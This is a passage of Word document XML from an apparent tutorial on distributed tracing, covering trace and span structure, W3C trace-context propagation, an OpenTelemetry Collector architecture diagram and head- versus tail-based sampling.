    <w:p w14:paraId="30B16619" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="20A68A27" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>From this trace we can see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EAF12" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Total request took 250ms+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F0228" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Payment Service took 180ms (72% of total)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE29059" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - The Stripe API call (150ms) is the dominant contributor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C87BAD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Everything else is fast (&lt;15ms each)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D716B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D34D9FA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Without tracing: "Requests are slow" (which service? which call? why?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B504C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>With tracing: "Stripe API is slow for this specific request type"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24642C7B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trace anatomy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B3F5B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A4346" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Trace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743BDA0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Unique trace_id (propagated across all services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCEA439" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - Collection of spans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F1DB6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="0DA3A477" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Span:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9186F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - span_id (unique within trace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B44CC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - parent_span_id (which span called this one)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B2438" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - operation_name ("POST /api/orders")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F595794" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - service_name ("order-service")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41819D82" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - start_time, duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24846EC7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - status (OK, ERROR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A8703" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - attributes/tags: {user_id: "42", order_id: "789", db.statement: "INSERT INTO..."}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A32D7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  - events/logs: timestamped annotations within the span</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BD3727" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Context propagation (how trace_id flows across services):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF98CDD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329DCEE1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Service A receives request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B166A59" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Extract or generate trace_id from incoming headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FAC5A7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Create root span</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D721C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → When calling Service B: inject trace_id into outgoing HTTP headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F58DD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="1150F513" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>HTTP headers (W3C Trace Context standard):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D684C2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  traceparent: 00-abc123def456-789ghi-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B002C8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">               version-trace_id-parent_span_id-flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C67999C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="1D7CBF2E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Service B receives request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF0274" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Extract trace_id from incoming headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE0591" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Create child span (parent = Service A's span)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B854F5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → When calling Service C: inject same trace_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA00735" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="79414BAD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Result: All spans across all services share the same trace_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59011A5E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        → Can reconstruct the full request flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D5EFE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tracing architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B11FDC2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40B9E4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────────┐  ┌────────┐  ┌────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28456E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│Service │  │Service │  │Service │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC727E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│   A    │  │   B    │  │   C    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C103F8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│        │  │        │  │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C223C6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ [SDK]  │  │ [SDK]  │  │ [SDK]  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3453D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└───</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└───</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└───</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3F4A0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    │            │            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C7231" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25BA5C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌──────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B3F4D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>│     Collector (OTel Collector)    │  ← Receives spans from all services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31684BAF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Batch, process, sample        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C42D5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Export to backends             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C9915" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38597AD8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA7D7F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">       ┌──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D577E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065234E6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  ┌────────┐ ┌────────┐ ┌────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC410E9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │ Jaeger │ │ Tempo  │ │ Zipkin │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC96B56" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │        │ │(Grafana)│ │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027B5BF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  └────────┘ └────────┘ └────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74270B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sampling (traces are expensive — you can't store all of them):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590AB5D9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF3268" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Head-based sampling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D7AD4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Decision at trace START: "Sample 1% of traces" (random)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240DCF97" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Pro: Simple, predictable cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E18CA7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Con: Might miss the interesting 0.1% of traces (errors, high latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDB05F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="7EC3EDD8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Tail-based sampling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8886A8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Collect ALL spans temporarily. AFTER trace completes, decide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A2B95E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Error occurred? → KEEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE18ED" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Duration &gt; p99? → KEEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF0467" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Specific user/endpoint? → KEEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158C81F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Otherwise → DROP (or sample 1%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26022BE6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5AD9D7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Pro: Guarantees interesting traces are captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463EB4B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Con: Higher resource usage (must buffer all spans before deciding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08465C17" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E47888B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  This is the preferred approach for production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694DFA16" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="6B282E8F">
          <v:rect id="_x0000_i6132" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8003AB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. OpenTelemetry — The Unified Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19A39F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 What OpenTelemetry Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6BED5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
